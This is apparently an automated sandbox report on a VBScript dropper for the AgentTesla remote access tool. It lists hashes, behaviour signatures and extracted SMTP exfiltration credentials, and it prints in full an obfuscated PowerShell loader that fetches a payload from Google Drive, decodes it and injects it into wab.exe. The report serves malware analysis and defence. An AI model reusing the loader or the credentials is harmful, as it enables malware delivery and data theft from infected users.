Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2024 09:26
Static task
static1
Behavioral task
behavioral1
Sample
STOPA 2024-0181.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
STOPA 2024-0181.vbs
Resource
win10v2004-20240419-en
General
-
Target
STOPA 2024-0181.vbs
-
Size
10KB
-
MD5
420b31e03f0aac291050345120dbb1c8
-
SHA1
e0968e51e1f6d8f3335ef9b9d5dea2c3f2253079
-
SHA256
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb
-
SHA512
b5d3d8a5fc03ffb54a166b30f4bcdb1073fbdc08df5013b170321199f1939de630f596d058f44a5c4d9bae8f7f3130a6cd3b1d5a11d7f1d9753aee926f0dd7ac
-
SSDEEP
192:LIOoWa+tZFy6AA+1WHfa1vD7nSruBun2mF:LmW7y6AASOE7nSr0uBF
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 4952 WScript.exe 14 5100 powershell.exe 16 5100 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fMNDB = "C:\\Users\\Admin\\AppData\\Roaming\\fMNDB\\fMNDB.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 36 drive.google.com 13 drive.google.com 14 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1552 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 432 powershell.exe 1552 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 432 set thread context of 1552 432 powershell.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 5100 powershell.exe 5100 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 1552 wab.exe 1552 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1552 wab.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4952 wrote to memory of 5100 4952 WScript.exe 86 PID 4952 wrote to memory of 5100 4952 WScript.exe 86 PID 5100 wrote to memory of 2524 5100 powershell.exe 90 PID 5100 wrote to memory of 2524 5100 powershell.exe 90 PID 5100 wrote to memory of 432 5100 powershell.exe 98 PID 5100 wrote to memory of 432 5100 powershell.exe 98 PID 5100 wrote to memory of 432 5100 powershell.exe 98 PID 432 wrote to memory of 3880 432 powershell.exe 101 PID 432 wrote to memory of 3880 432 powershell.exe 101 PID 432 wrote to memory of 3880 432 powershell.exe 101 PID 432 wrote to memory of 1552 432 powershell.exe 102 PID 432 wrote to memory of 1552 432 powershell.exe 102 PID 432 wrote to memory of 1552 432 powershell.exe 102 PID 432 wrote to memory of 1552 432 powershell.exe 102 PID 432 wrote to memory of 1552 432 powershell.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STOPA 2024-0181.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"3⤵PID:2524
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"4⤵PID:3880
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
454KB
MD5fc62b80e164b7026eac50c83ad55770e
SHA10cd849e2fa77e57d94ebe8c5b7685474e2438e48
SHA256473ff96f43544f04cb08a9e6faa4a72162ebd8e93363cb82cdd914f34eb38f1c
SHA512924b368df010aecca6d7efb572ab0a8d7a5afaacb3c12b94877f0606efe113184180fdf47067d00004f49297c3978054abc0980b51c04b8e145d9e276041c8de